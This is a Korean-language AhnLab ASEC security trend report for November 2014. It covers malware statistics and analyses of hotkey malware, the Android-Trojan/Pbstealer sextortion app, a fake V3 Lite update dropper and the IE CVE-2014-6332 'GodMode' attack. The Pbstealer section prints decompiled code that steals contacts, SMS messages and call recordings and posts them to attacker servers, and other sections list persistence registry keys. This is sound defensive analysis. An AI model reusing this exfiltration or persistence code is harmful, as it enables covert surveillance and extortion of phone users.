ASEC Report VOL.59 November, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에
|
|
- 명은 황
- 6 years ago
- Views:
Transcription
1 Security Trend ASEC Report VOL.59 November, 2014
2 ASEC Report VOL.59 November, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정 보를담고있습니다. 자세한내용은안랩닷컴 ( 에서확인하실수있습니다 년 11 월보안동향 Table of Contents 1 보안통계 STATISTICS 01 악성코드통계 02 웹통계 03 모바일통계 보안이슈 SECURITY ISSUE 01 키보드의키를이용한악성코드 야마꼬 와 핫키 02 개인정보유출부터사회문제까지 몸캠피싱주의 03 안랩 V3 Lite 업그레이드 사칭한악성코드 04 IE 취약점이용해사용자 PC를지배하는 갓모드 (GodMode) 공격 악성코드상세분석 Analysis-In-Depth 금융사이트보안솔루션으로위장한악성코드 27 ASEC REPORT 59 Security Trend 2
3 1 보안통계 STATISTICS 01 악성코드통계 02 웹통계 03 모바일통계 ASEC REPORT 59 Security Trend
4 보안통계 01 악성코드통계 Statistics ASEC 이집계한바에따르면 2014 년 11 월한달간탐지된악성코드수는 426 만 3,988 건이다. 이는전월 406 만 5,620 건보다 19 만 8,368 건증가한수치다. 한편 11 월에수집된악성코드샘플수는 605 만 9,563 건으로집계됐다. [ 그림 1-1] 에서 탐지건수 란고객이사용중인 V3 등안랩의제품이탐지한악성코드의수를의미하며, 샘플 수집수 는안랩이자체적으로수집한전체악성코드의샘플수를의미한다. 6,000,000 5,000,000 4,000,000 4,065,620 4,263,988 3,000,000 2,000,000 2,523,094 1,000, ,650,555 4,572,315 6,059,563 탐지건수샘플수집수 9 월 10 월 11 월 [ 그림 1-1] 악성코드추이 ASEC REPORT 59 Security Trend 4
5 [ 그림 1-2] 는 2014 년 11 월한달간유포된악성코드를주요유형별로집계한결과이다. 불필요한프로그 램인 PUP(Potentially Unwanted Program) 가 55.87% 로가장높은비중을차지했고, 트로이목마 (Trojan) 계열의악성코드가 24.9%, 애드웨어 (Adware) 가 8.78% 로그뒤를이었다. 0.43% 2.69% 7.33% 55.87% 8.78% 24.9% PUP Trojan Adware etc Worm Downloader [ 그림 1-2] 주요악성코드유형 [ 표 1-1] 은 11 월한달간가장빈번하게탐지된악성코드 10 건을진단명기준으로정리한것이다. Adware/ Win32.SwiftBrowse 가총 54 만 575 건으로가장많이탐지되었고, PUP/Win32.IntClient 가 16 만 185 건으로그뒤를이었다. [ 표 1-1] 악성코드탐지최다 10건 ( 진단명기준 ) 순위 악성코드진단명 탐지건수 1 Adware/Win32.SwiftBrowse 540,575 2 PUP/Win32.IntClient 160,185 3 Unwanted/Win32.Exploit 127,284 4 Trojan/Win32.Agent 123,621 5 PUP/Win32.MyWebSearch 117,230 6 Trojan/Win32.OnlineGameHack 107,143 7 Trojan/Win32.Starter 100,825 8 PUP/Win32.Helper 73,579 9 Adware/Win32.Shortcut 69, Adware/Win32.SearchSuite 61,161 ASEC REPORT 59 Security Trend 5
6 보안통계 02 웹통계 Statistics 2014 년 11 월악성코드유포지로악용된도메인은 946 개, URL 은 6,018 개로집계됐다. 또한 11 월의악성 도메인및 URL 차단건수는총 633 만 313 건이다. 악성도메인및 URL 차단건수는 PC 등시스템이악성 코드유포지로악용된웹사이트의접속을차단한수이다. 7,000,000 6,000,000 6,081,235 6,330,313 5,000,000 4,000,000 3,545,673 3,000,000 2,000,000 40,000 30,000 20,000 15,842 18,431 10,000 1,338 1, ,018 악성도메인 /URL 차단건수 악성코드유포도메인수 0 9 월 10 월 11 월 악성코드유포 URL 수 [ 그림 1-3] 악성코드유포도메인 /URL 탐지및차단건수 ASEC REPORT 59 Security Trend 6
7 보안통계 03 모바일통계 Statistics 2014 년 11 월한달간탐지된모바일악성코드는 9 만 8,555 건으로집계되었다. 250, , , ,000 75, ,335 98,555 50, 월 10 월 11 월 [ 그림 1-4] 모바일악성코드추이 ASEC REPORT 59 Security Trend 7
8 [ 표 1-2] 는 11 월한달간탐지된모바일악성코드유형중상위 10 건을정리한것이다. Android-PUP/ SmsReg 가지난달보다 7,001 건증가한 2 만 96 건으로집계되었다. [ 표 1-2] 유형별모바일악성코드탐지상위 10 건 순위악성코드진단명탐지건수 1 Android-PUP/SmsReg 20,096 2 Android-Trojan/FakeInst 17,057 3 Android-PUP/Dowgin 10,271 4 Android-Trojan/Opfake 5,268 5 Android-PUP/SMSreg 2,954 6 Android-Trojan/SmsSpy 2,757 7 Android-Trojan/SMSAgent 2,584 8 Android-PUP/Noico 1,842 9 Android-Trojan/SmsSend 1, Android-PUP/Airpush 1,474 ASEC REPORT 59 Security Trend 8
9 2 보안이슈 SECURITY ISSUE 01 키보드의키를이용한악성코드 야마꼬 와 핫키 02 개인정보유출부터사회문제까지 몸캠피싱주의 03 안랩 V3 Lite 업그레이드 사칭한악성코드 04 IE 취약점이용해사용자 PC를지배하는 갓모드 (GodMode) 공격 ASEC REPORT 59 Security Trend
10 보안이슈 01 키보드의키를이용한악성코드 야마꼬 와 핫키 Security Issue 키보드의 ' 스페이스 (space)' 키와 ' 엔터 (Enter)' 키는자주사용하는키때문인지악성코드제작자는특별한기능을부여하기도한다. 스페이스와엔터키에관련된악성코드두종류를살펴보겠다. 첫번째는 2010년발견된일명 야마꼬바이러스 라고불리는악성코드이다. 당시포털사이트 Q&A 게시판에는 [ 그림 2-1] 과같은글이게시되었다. 반면시스템관리툴및작업관리자, 레지스트리편집기등특정프로세스의실행을방해하는기능도있다. 이기능은자신을보호하기위해특정소리가나도록하여자신을노출시키는것과는대조적으로, 악성코드자신을숨기는기능도추가하였다. 시스템시작시자동실행으로설정하고, 폴더옵션비활성화및숨김속성을변경하지못하게하며, 작업관리자를비활성화시키는행위는사용자를속이기에충분하다. 표 2-2 실행방해프로세스목록 그림 2-1 포털사이트 Q&A 페이지에등록된질문 해당악성코드감염시나타나는증상은특정키를누르면각키에따라다양한소리가난다. 흔히악성코드는자신을숨기기위해다양한방법을사용하는데이악성코드는자신을드러내고있었다. 표 2-1 키에따른음성 Space Bar : 야마꼬 Enter : 아하하하 그외 Tab, Delete 키등 0001B66C 0041C26C 0001B C B C B6AC 0041C2AC 0001B6C4 0041C2C4 0001B6D8 0041C2D8 0001B6EC 0041C2EC 0001B C B C B72C 0041C32C 0001B73C 0041C33C 0001B C B C B C B79C 0041C39C 0 procexp.exe 0 procmon.exe 0 autoruns.exe 0 KillProcess.exe 0 PrcInfo.exe 0 filemon.exe 0 regmon.exe 0 taskmgr.exe 0 HiJackThis.exe 0 avz.exe 0 phunter.exe 0 UnlockerAssistant.exe 0 Unlocker.exe 0 regedit.exe 0 msconfig.exe ASEC REPORT 59 Security Trend 10
11 표 2-3 악성코드에의해생성된파일및레지스트리변경파일생성 C: INDOWS system32 logo.scr C: WINDOWS system32 drivers servise.exe C: WINDOWS system32 drivers Cache XXX.scr 레지스트리변경 HKLM SOFTWARE Microsoft Windows CurrentVersion R un NvCplDeamon "C: WINDOWS system32 drivers servise.exe" HKCU Software Microsoft Windows CurrentVersion Expl orer Advanced "0" HKCU Software Microsoft Windows CurrentVersion Expl orer Advanced ShowSuperHidden "0" HKCU Software Microsoft Windows CurrentVersion Expl orer Advanced HideFileExt "1" HKLM SOFTWARE Microsoft Windows CurrentVersion p olicies explorer NoFolderOptions "1" HKCU Software Microsoft Windows CurrentVersion Poli cies System DisableTaskMgr "1" 두번째는 2014년에발견된 핫키 (Hotkey, 바로가기키 ) 를이용한악성코드이다. 이악성코드는사용자가인지하지못한상황에서자동실행시키고시스템에서오랫동안살아남기위해다양한방법을이용해왔다. 윈도에는이러한기능을지원해주는여러가지값이있다. 그값은 [ 표 2-4] 와같다. 표 2-4 자동실행되는파일등록경로윈도시작시자동실행 [HKCU Software Microsoft Windows CurrentVersion Run] [HKCU Software Microsoft Windows NT CurrentVersion- Winlogon] [HKLM Software Microsoft Windows CurrentVersion Run] [HKLM S Microsoft Windows NT CurrentVersion- Winlogon] 시작프로그램등록 %APPDATA% Microsoft Windows Start Menu Programs Startup %ProgramData% Microsoft Windows Start Menu Programs Startup 예약된작업등록 C: Windows Tasks 서비스등록 [HKLM SYSTEM CurrentControlSet Services] 위와같은방법은악성코드에서흔히사용된다. 최근에는다른방법을이용하여자동으로실행되는악성코드가발견되었다. 감염경로는취약한웹사이트또는 PUP( 불필요한프로그램 ) 에의해감염되는것으로확인되었다. 해당악성코드는 [ 표 2-5] 와같이스스로를 C: Program Files Common Files 경로에복사한후삭제한다. 표 2-5 파일생성경로파일생성경로 C: Program Files Common Files sochvst.exe C: Documents and Settings Administrator 시작메뉴 Xnv.url C: Documents and Settings Administrator 시작메뉴 Xnz.url 사용자가인지하지못하도록악성코드가실행하는방법은 [ 그림 2-2] 와같이파일의실행원리를확인하면알수있다. ASEC REPORT 59 Security Trend 11
12 또한, 악성코드를제거하더라도 URL 파일을삭제하지않으면엔터또는스페이스키를입력할때마다알림창이나타나 PC 사용에불편을준다. 그림 2-2 URL 파일텍스트정보 Xnv.url( 상 ) / Xnz.url( 하 ) 그림 2-4 악성코드삭제후핫키동작시발생하는오류메시지 해당악성코드는 [ 그림 2-5] 와같이네트워크와지속적으로연결을유지한다. 그림 2-5 네트워크연결정보 그림 2-3 핫키정보 Xnv.url( 상 ) / Xnz.url( 하 ) [ 그림 2-3] 과같이바로가기키값을각각 스페이스 와 엔터 로설정하면, 사용자가엔터또는스페이스키를입력할때마다악성코드를실행한다. [ 표 2-4] 와같은설정없이도악성코드를자동으로실행시킬수있다. V3 제품에서는관련악성코드를다음과같이진단하고있다. <V3 제품군의진단명 > Win-Trojan/Agent BN ( ) Backdoor/Win32.Zegost ( ) ASEC REPORT 59 Security Trend 12
13 보안이슈 02 개인정보유출부터사회문제까지 몸캠피싱주의 Security Issue 최근몸캠피싱에관한뉴스가언론에자주등장하고있다. 2013년처음등장한몸캠피싱은일종의사회공학기법과심리를교묘하게이용하였다. 관련악성앱또한꾸준히발전하고있으며피해자도증가하고있다. 실제로몸캠피싱피해자는정상적인사회생활이어려울정도로심각한후유증을겪고있으며, 몸캠피싱을당한 20대남성이스스로목숨을끊는사건까지발생하는등심각한사회문제로이어지고있다. 이와관련해최근몸캠피싱에사용되는 Android- Trojan/Pbstealer 악성앱에대해상세히살펴본다. [ 그림 2-6] 과같이몸캠피싱과정은온라인채팅서비스를통해만난상대방에게모바일화상채팅서비스를이용하여대화를유도한다. 화상채팅이시작되면알몸화상채팅을유도하며피해자의얼굴을보여줄것을요구한다. 가해자는피해자모르게화상채팅내용을동영상으로녹화한다. 목소리가들리지않는다며새로운앱을설치할것을요구하고다운로드할수있는인터넷주소를보낸다. 피해자의스마트폰에앱이설치되면스마트폰에저장된다양한정보를공격자에게유출한다. 이때유출되는정보는피해자의연락처, 스마트폰에저장된주소록과추가로다양한정보들이포함된다. 공격자는정보유출에성공하면피해자에게화상채팅내용이동영상으로녹화되었으니요구금액을송금하지않으면지인들에게동영상을유포하겠다고협박한다. 그림 2-6 몸캠피싱과정 1. 설치및동작몸캠피싱에사용되는 Android-Trojan/Pbstealer 악성앱설치시요구하는권한은 [ 그림 2-7] 과같다. 전화, 문자, 위치, 연락처, 내장메모리접근권한과오 ASEC REPORT 59 Security Trend 13
14 디오녹음및인터넷기능사용권한등이다. 시스템설정을변경할수있고스마트폰시작시자동으로실행될수있다는점등은일반적인앱이요구하는내용과는차이가있다. 한다. 이때사용자모르게스마트폰에저장되어있는다양한정보를공격자의서버로전송한다. 그림 2-7 Android-Trojan/Pbstealer 설치시권한요구 해당앱이설치되면 음성지원, SecretTalk, 검찰청보안강화, v3, Authentication 등다양한이름의앱이스마트폰화면에나타난다. 그림 2-9 Android-Trojan/Pbstealer 실행시공격자서버로유출되는정보들 2. 상세기능분석앞서살펴본악성앱의기능은에러메시지출력후종료되지만, 네트워크패킷을살펴본결과다양한정보가공격자의서버로유출되었다. 유출된정보와상세한기능을알아보기위해먼저악성앱의명세를가진 AndroidManifest.xml 파일을살펴보자. 그림 2-8 Android-Trojan/Pbstealer 실행화면 해당앱을실행하면 [ 그림 2-8] 과같이 기기관리자 설치를요구하며에러메시지를보여주고앱을종료 <?xml version='1.0' encoding='utf-8'?> <manifest xmlns:android=" com/apk/res/android" android:versioncode="1" android:versionname="1.0" package="com.android. secerettalk"> <uses-sdk android:minsdkversion="8" android:targetsdkversion="17"/> WAKE_LOCK"/> ASEC REPORT 59 Security Trend 14
15 RECEIVE_SMS"/> READ_SMS"/> WRITE_EXTERNAL_STORAGE"/> WRITE_INTERNAL_STORAGE"/> READ_EXTERNAL_STORAGE"/> READ_INTERNAL_STORAGE"/> READ_CONTACTS"/> INTERNET"/> READ_PHONE_STATE"/> RECEIVE_BOOT_COMPLETED"/> PROCESS_OUTGOING_CALLS"/> READ_PHONE_STATE"/> CALL_PHONE"/> <uses-permission android:name="com.android.launcher. permission.write_settings"/> <uses-permission android:name="com.android.launcher. permission.read_settings"/> WRITE_SETTINGS"/> READ_SETTINGS"/> ACCESS_COARSE_LOCATION"/> ACCESS_FINE_LOCATION"/> ACCESS_MOCK_LOCATION"/> RECORD_AUDIO"/> SEND_SMS"/> <application android:debuggable="true" android:allowbackup="true"> <activity android:name="com.android.secrettalk. SecretTalk"> <intent-filter> <action android:name="android.intent.action. MAIN"/> <category android:name="android.intent.category. LAUNCHER"/> </intent-filter> </activity> <receiver android:name="com.android.secrettalk. RestartReceiver"> <intent-filter> <action android:name="android.intent.action.boot_ COMPLETED"/> </intent-filter> </receiver> <receiver android:label="secrettalk_device_admin" android:name="com.android.secrettalk. secrettalkreceiver" android:permission="android.permission.bind_ DEVICE_ADMIN"> <meta-data android:name="android.app.device_admin" 7f040000"/> <intent-filter> <action android:name="android.app.action.device_ ADMIN_ENABLED"/> </intent-filter> </receiver> <service android:name="com.android.secrettalk. ReceiverRegisterService"/> </application> </manifest> 위와같이 AndroidManifest 파일을통해해당앱이실행할때사용하는다양한권한및기능을확인할수있다. 수신되거나저장되어있는 SMS, 내 외부 ASEC REPORT 59 Security Trend 15
16 저장장치의읽기및쓰기, 주소록접근, 스마트폰의정보, 송수신하는전화, SMS 발송기능, 오디오녹음기능, 위치정보확인기능, 시스템설정변경기능등다양한권한을필요로하는것을알수있다. 또한스마트폰이동작하면자동실행기능이있다는것도알수있다. 악성앱을실행했을때동작하는클래스들중중요클래스를살펴보자. 1 SecretTalk 악성앱을실행하면 SecretTalk 클래스가실행되며화면에보이는에러메시지를출력하고 ReceiverRegisterService 클래스를실행한다. 그림 2-10 SecretTalk 클래스구조 ReceiverRegisterService 클래스는스마트폰에저장되어있는다양한정보를공격자의서버로유출한다. 유출정보는다음의코드에서자세히알수있다. public void oncreate() { super.oncreate(); GlobalData.getInstance().setContext(this. getapplicationcontext()); v0 = this.getsystemservice("phone"); v1 = v0.getline1number().tostring(); if(v1.equals("")!= 0) { v1 = v0.getsimserialnumber(); } GlobalData.my_phonenumber = v1.replaceall("\d+", ""). tostring(); this.loadgps(); this._obj = new JsonObject(); this._obj.add("contacts", ContactInfo.getContactInfo()); this._obj.addproperty("user_pn", GlobalData.my_ phonenumber); this._obj.add("location", ContactInfo.getPosition()); this._obj.add("call_history", ContactInfo.getCallDetails()); this._obj.add("sms_history", ContactInfo.getAllSMS()); Log.w("contact", "send start"); v3 = new Void[0]; new ReceiverRegisterService$2(this).execute(v3); this.smsfilter1.setpriority(1000); this.smsreceiver = new SmsReceiver(); this.registerreceiver(this.smsreceiver, this.smsfilter1); this.smsfilter2.setpriority(999); this.smscheck = new SmsCheck(); this.registerreceiver(this.smscheck, this.smsfilter2); this.callfilter.addaction("android.intent.action.phone_ STATE"); this.callfilter.setpriority(888); this.callreceiver = new CallReceiver(); this.registerreceiver(this.callreceiver, this.callfilter); this.packagefilter.addaction("android.intent.action. PACKAGE_REMOVED"); this.packagefilter.adddatascheme("package"); this.packagereceiver = new PackageManager(); this.registerreceiver(this.packagereceiver, this. packagefilter); this.startphonestatelistener(); this.monitorsms(); return; } ASEC REPORT 59 Security Trend 16
17 유출되는정보는스마트폰에저장된주소록, 사용자정보, 위치정보, 송수신내역, 송수신 SMS 내역등이다. 이후수신되는 SMS를실시간으로모니터링하여외부로유출한다. 2 SmsReceiver SMS가수신되면송신자정보, SMS 본문, 수신된날짜를수집한다. SmsReceiver SmsReceiver$1 그림 2-11 SmsReceiver 클래스구조 v0 = new JsonObject(); v0.addproperty("user_pn", GlobalData.my_phonenumber); v0.addproperty("call_pn", this.val$strfrom); v0.addproperty("contents", URLEncoder.encode(this. val$strmsg)); v0.addproperty("cdate", Long.valueOf((System. currenttimemillis() / ))); v0.addproperty("type", Integer.valueOf(1)); HttpManager.postHttpResponse(URI.create(" android_api.php?mname=smsinformation&format=json"), v0.tostring()); return 0; } ReceiverRegisterService.access$4(this.this$0). sendemptymessage(7000); return 0; } 수집된정보는다음과같이 JSON(JavaScript Standard Object Notation) 형태로가공되어외부로유출되며, SMS 차단을설정한경우사용자가확인할수없도록수신된 SMS를제거한다. protected varargs Void doinbackground(void[] p11) { v1 = new JsonObject(); v1.addproperty("phone_number", GlobalData.my_ phonenumber); v3 = HttpManager.postHttpResponse(URI. create(" serverside/android_api.php?mname=isblockinformation&for mat=json"), v1.tostring()); if(v3.equals("0") == 0) { if(v3.equals("1")!= 0) { SmsReceiver.is_blocked = 1; } } else { SmsReceiver.is_blocked = 0; } 3 SmsCheck 사용자가발송한 SMS는스마트폰에저장되어있는데이터로추출및가공하여외부로유출한다. SmsCheck SmsCheck$OutgoingSmsLogger 그림 2-12 SmsCheck 클래스구조 protected varargs Void doinbackground(void[] p16) { this.timelastchecked = this.prefs.getlong("time_last_ checked", -1.0, v4); v0 = this.mcontext.getcontentresolver(); v6 = new JsonObject(); this.cursor = v0.query(this.sms_uri, this.columns, new StringBuilder("type = 2 AND date > ").append(this.timelastchecked). tostring(), 0, "date DESC"); ASEC REPORT 59 Security Trend 17
18 if(this.cursor.movetonext() == 0) { Log.w("outgoing sms", "there are nothing"); v1 = 0; } else { v13 = new StringBuilder(String.valueOf("")).append(" outgoing sms ").tostring(); this.timelastchecked = this.cursor.getlong(this. cursor.getcolumnindex("date")); do { v9 = this.cursor.getlong(this.cursor.getcolumnindex("date")); v7 = this.cursor.getstring(this.cursor.getcolumnindex("address")); v3 = "body"; v8 = this.cursor.getstring(this.cursor. getcolumnindex("body")); v14 = new StringBuilder(String.valueOf(v9)).append(",").append(v7).append(",").append(v8).toString(); if(v13.contains(v14) == 0) { v13 = new StringBuilder(String.valueOf(v13)). append(v14).tostring(); v6.addproperty("call_pn", v7); v6.addproperty("type", Integer.valueOf(2)); v6.addproperty("contents", URLEncoder.encode(v8)); v6.addproperty("user_pn", GlobalData.my_ phonenumber); v6.addproperty("cdate", Long.valueOf((System. currenttimemillis() / ))); Log.d("Test", new StringBuilder("date sent: ").append(v9).tostring()); Log.d("Test", new StringBuilder("target number: ").append(v7).tostring()); v2 = new StringBuilder("number of characters: "); v3 = v8.length(); Log.d("Test", v2.append(v3).tostring()); v13 = new StringBuilder(String.valueOf(v13)). append("").tostring(); } } while(this.cursor.movetonext()!= 0); this.cursor.close(); 4 CallStateListener 통화내용을녹음파일로만들어외부로유출하고스마트폰에저장된녹음파일은삭제한다. CallStateListener CallStateListener$1 그림 2-13 CallStateListener 클래스구조 Recorder_prepare를호출하여파일로녹음을시작한다. private void Recorder_Prepare() { GlobalData._recorder.prepare(); GlobalData._recorder.start(); Log.w("call", "start record"); return; } 서버로통화기록과녹음파일전송 녹음된파일은업로드파일 (uploadfile) 을호출하 여통화시간, 전화번호등의추가정보와함께외부로유출된다. public static int uploadfile(string p41) { v4[0] = "number"; v4[1] = "type"; v4[2] = "date"; v4[3] = "duration"; v27 = GlobalData.getInstance().getContext(). getcontentresolver().query(calllog$calls. CONTENT_URI, v4, 0, 0, "date DESC"); v29 = v27.getcolumnindex("number"); v37 = v27.getcolumnindex("type"); v17 = v27.getcolumnindex("date"); v21 = v27.getcolumnindex("duration"); ASEC REPORT 59 Security Trend 18
19 v30 = new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String. valueof(new StringBuilder(String.valueOf("")).append("&call_ num=").append(v31).tostring())).append("&type="). append(v15).tostring())).append("&udate=").append((long. parselong(v13) / )).toString())).append("&call_time="). append(v14).tostring(); } v38(new StringBuilder(" monitor/app/serverside/android_api.php?mname=audiou pdate&format=json&phone_num=").append(contactinfo. getmyphonenumber()).append(v30).tostring()); 지금까지살펴본 Android-Trojan/Pbstealer 는사용자의스마트폰내전화번호를포함한중요정보와저장되어있는연락처정보를외부로유출한다. 사 용자와연락할수있는방법을알아내고, 사용자를협박하기위해지인들의주소록을확보한다. 추가로와이파이 (Wi-Fi) 와 GPS를통해실시간으로위치정보를알아내고송수신된 SMS와통화목록은물론통화내용까지유출한다. 몸캠피싱악성앱은개인정보유출은물론, 사회생활이불가능해질정도로피해가크다. 따라서몸캠피싱의과정을이해하고비슷한패턴으로접근하는수상한사람은가급적피하는것이좋다. 또한새로운스마트폰애플리케이션을설치하기전에해당애플리케이션이동작하는데불필요한권한이있는지주의깊게살펴보는습관이필요하다. 이와함께모바일백신을이용하여새롭게설치되는애플리케이션을확인해보는것도좋은방법이다. ASEC REPORT 59 Security Trend 19
20 보안이슈 03 안랩 V3 Lite 업그레이드 사칭한악성코드 Security Issue 최근 [ 그림 2-14] 와같이 V3 Lite를최신버전으로업그레이드하세요! 라는제목으로 안랩 을사칭한메일이수신되었다. 그림 2-14 안랩을사칭한이메일 메일에는 V3 Lite의업그레이드를권고하는내용과관련파일이첨부되었으며, 해당파일은 [ 그림 2-15] 와같이윈도폴더아이콘으로위장한 EXE 실행파일이다. 실행한다. [ 그림 2-16] 과같이악성코드가실행되면 C: Documents and Settings [ 사용자계정 ] Local Settings Application Data 경로에 local. exe 파일을생성하며, 해당악성코드가위치한경로내에 [ 그림 2-15] 와같은파일명 (V3Lite 설치방법및제품번호 Ver ) 의폴더를생성한다. 악성코드가생성한폴더는자동으로풀스크린 (FullScreen) 상태로열리며, 사용자가악성코드실행을눈치채지못하도록하는치밀함을보인다. 생성된폴더내에는 V3 Lite UI를캡처한이미지파일과제품번호 (Serial Number) 가기재된텍스트파일이있다. 그림 2-15 폴더로가장한 EXE 실행파일 알려진파일형식의파일확장명숨기기 기능이활성화된윈도사용자라면의심없이해당악성코드를 그림 2-16 악성코드실행시생성되는폴더내파일들 ASEC REPORT 59 Security Trend 20
21 악성코드는추가로생성한 _selfmove.bat 의 batch 명령어를통해 C: Documents and Settings [ 사용자계정 ] Local Settings Application Data 경로내에 testmove.pdf 로복제한후스스로삭제한다. 한편, [ 그림 2-18] 과같이첨부파일에궁금증을유발시키는메일문구로사용자에게실행을유도하는악성코드유포방식은지난 10월부터시스템정보를탈취하는악성코드로이슈가된 my new photo 스팸메일과유사하다. 이후해당악성코드는추가행위를하지않지만, [ 그림 2-17] 과같이추가생성됐던 local.exe 악성코드를통해특정 URL과통신할것으로추정된다. 그림 2-17 local.exe 가통신할것으로추정되는특정 URL 그림 2-18 악성코드를첨부한 my new photo 스팸메일 local.exe 악성코드가통신할 C&C로추정되는서버는현재존재하지않는다. 정확한악성행위는파악할수없으나해당주소로부터추가적인악성코드를다운로드할것으로예상된다. local.exe가연결을시도하는특정 URL은 [ 표 2-6] 과같다. 표 2-6 local.exe가연결을시도하는 URL hxxp://d.ahn*****.com/***/update2014.php hxxp://d.ahn*****.com/***/download2014.htm hxxp://d.ahn*****.com/***/downloadsuccess.php hxxp://d.ahn*****.com/***/downloadfail.php hxxp://d.ahn*****.com/***/exefail.php 최근유포된두가지사례처럼갈수록진화하는악성코드가지속적으로발견됨에따라사용자는출처가불분명한파일의다운로드와실행에도각별한주의가필요하다. V3 제품에서는관련악성코드를다음과같이진단하고있다. <V3 제품군의진단명 > Dropper/Win32.Agent ( ) Trojan/Win32.Agent ( ) ASEC REPORT 59 Security Trend 21
22 보안이슈 Security Issue 04 IE 취약점이용해사용자 PC를지배하는 갓모드 (GodMode) 공격 최근인터넷익스플로러 (Internet Explorer, 이하 IE) 환경에서발생하는 OLE 자동화배열원격코드실행취약점 (CVE ) 을이용한공격사례가급증하고있다. 윈도 (Windows) 95 이상의 OS 버전과 IE 3 이상의웹브라우저가해당취약점의영향을받아피해발생범위가상당히넓다. 게다가최근해당취약점을이용한공격코드가공개되면서구체적인공격사례들이급증하고있다. 특히국내에서는지난 11월중순경영화예매사이트나여행사이트, 인터넷서점등의웹사이트가해당취약점에의해침해된사례가확인됐다. 실제로해당취약점을이용한국내주요사이트침해사례에서도공격자는웹페이지내에악성스크립트를삽입하여피해자들을취약점랜딩페이지로유도하였다. 취약점랜딩페이지란공격코드 (Exploit Code) 들로구성된페이지로, 공격자들은취약점랜딩페이지를구성하여사용자들을유도한다. 공격자는랜딩페이지로접속한사용자들의 PC에설치되어있는웹브라우저나자바 (Java), 어도비플래시플레이어 (Adobe Flash Player) 등의프로그램버전정보를확인한후각버전에해당하는공격코드를원격에서실행한다. CVE 취약점은윈도 OLE(Object Linking and Embedding) 자동화배열원격코드실행취약점으로, IE가 OLE 객체를처리하는과정에서원격으로코드를실행하는취약점이다. 공격자는해당취약점을이용해사용자시스템에서허용되지않은메모리개체에접근할수있다. 또한이를이용해정상웹사이트를침해하고이손상된웹사이트에접속한사용자들을또다른특수하게조작된웹사이트로유도할수있다. 1. 악성페이지로사용자유도 그림 2-19 IE 취약점공격흐름도 ASEC REPORT 59 Security Trend 22
23 또한공격자들은악성스크립트를난독화하여삽입함으로써관리자들이쉽게인지할수없도록하였다. 난독화방법으로는문자열을 ASCII 값 (10진수또는 16진수 ) 으로표현 ( 대체 ) 하거나자바스크립트난독화기법 (Dean Edward Packer 등 ) 을주로사용하였다. Script와관련이있다. VBScript는 ASP(Active Server Pages) 의기본스크립트언어로, IE는기본적으로 VBScript 엔진을포함하고있다. 최근구글크롬 (Google Chrome) 등여타브라우저는 VBScript를지원하지않는추세이나 IE는기존버전엔진과의호환성을위해여전히 VBScript를지원하고있다. 그림 2-20 난독화된스크립트 난독화된스크립트들을풀어내면대부분 [ 그림 2-21] 과같이특정 URL로유도하는내용이존재한다. 기본적으로 IE는특정한조건하에서만 VBScript 가실행되도록제한하고있다. VBScript를실행하기전에 COleScript 객체내의세이프모드 (safemode) 플래그를참조하여 VBScript 실행여부를결정하는것이다. 대부분세이프모드플래그가설정되어있기때문에무분별한 VBScript 실행은방지가능하다. 그러나공격자가세이프모드플래그를변경할수있게되면 IE에서원하는 VBScript 를임의로실행할수있는갓모드 (GodMode) 를이용할수있게된다. 그림 2-21 난독화해제스크립트 국내영화예매사이트 여행 인터넷서점사이트를노린이번사례에사용된랜딩페이지는사용자들이침해사이트를통해랜딩페이지에접속하면 PC 에 IE가설치되어있는지확인한후 CVE 취약점을이용해공격코드가실행되도록구성되어있었다. 2. CVE 취약점상세분석 CVE 취약점은스크립트언어인 VB- 물론일반적인방법으로 COleScript 객체의주소를얻고해당주소로이동하여플래그값을변경하는것은불가능하다. 그러나 CVE 취약점은정수오버플로우를발생시켜 VBScript 엔진내부의인가되지않은메모리영역을참조할수있게한다. 이를통해세이프모드플래그를변경할수있게되고갓모드를활성화시킬수있다. [ 그림 2-22] 는 CVE 취약점을유발하는코드의일부로, 코드에서정의한배열의크기를임의로재조정하는과정에서취약점을유발한다. ASEC REPORT 59 Security Trend 23
24 VBScript를실행할수있는권한을얻은공격자는최종적으로실행하고자하는코드를원격으로송신한다. 이과정에서백신 (AV) 및다양한보안기법을우회하기위해익스플로잇킷 (Exploit Kit) 을이용해난독화하여송신한다. [ 그림 2-24] 는난독화된코드의일부이다. 이번국내주요웹사이트침해사례에서는 CK 익스플로잇킷 (Exploit Kit) 이주로사용되었다. CK 익스플로잇킷은자바, 어도비플래시플레이어, IE 등의취약점을이용하여원격에서원하는코드를실행할수있게해주는익스플로잇킷중의하나다. 그림 2-22 취약점유발 VBScript 일부 이어 [ 그림 2-23] 과같은취약코드를통해 COle- Script 의주소를얻어온뒤객체안에존재하는세 이프모드플래그값을변경한다. 그림 2-24 난독화되어있는 VBScript 일부 난독화를해제하면 [ 그림 2-25] 와같은코드를확인 할수있다. 이코드에는특정 URL 에서파일을다운 로드하고실행하도록하는명령어들이담겨있다. 그림 2-23 갓모드 (GodMode) 획득을위한 VBScript 일부 위와같은과정을통해공격자는원격시스템에서갓모드를획득할수있다. 갓모드로자유롭게 그림 2-25 최종적으로실행되는 VBScript 일부 3. 악성코드유포및악의적인행위이번취약점을이용해유포되는악성코드의종류는 ASEC REPORT 59 Security Trend 24
